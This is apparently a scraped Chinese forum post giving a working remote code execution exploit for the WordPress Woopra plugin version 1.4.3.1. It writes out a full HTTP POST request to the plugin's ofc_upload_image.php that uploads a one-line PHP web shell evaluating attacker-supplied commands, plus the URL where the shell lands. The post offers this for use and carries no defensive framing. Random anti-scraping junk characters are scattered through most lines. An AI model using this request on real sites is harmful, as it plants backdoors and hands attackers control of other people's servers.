|
照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/
. a% Y& v4 Q# {此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip 3 L h9 m# T* I, ?' z5 V0 h @
exp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.16 u4 J- e& o5 \# ^
Host: ha.cker.in8 P6 M/ ?! ]% J
Proxy-Connection: keep-alive
2 R6 ^$ D+ Q7 \$ a* ICache-Control: max-age=0
; w9 } t" |; h0 A. |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* f+ c! e8 F0 j& ]. M% [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.369 Y* ~/ S7 \! R) {/ W' d8 W
Accept-Encoding: gzip,deflate,sdch; p. p7 d0 q4 F9 I
Accept-Language: zh-CN,zh;q=0.8
, L0 ^* z5 j4 B+ D& dContent-Length: 28 <?php eval($_POST['cmd']); ?> 8 ^5 o: M; Y8 u, m3 Q/ b
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php W8 Y& f6 R2 E% Z& `
|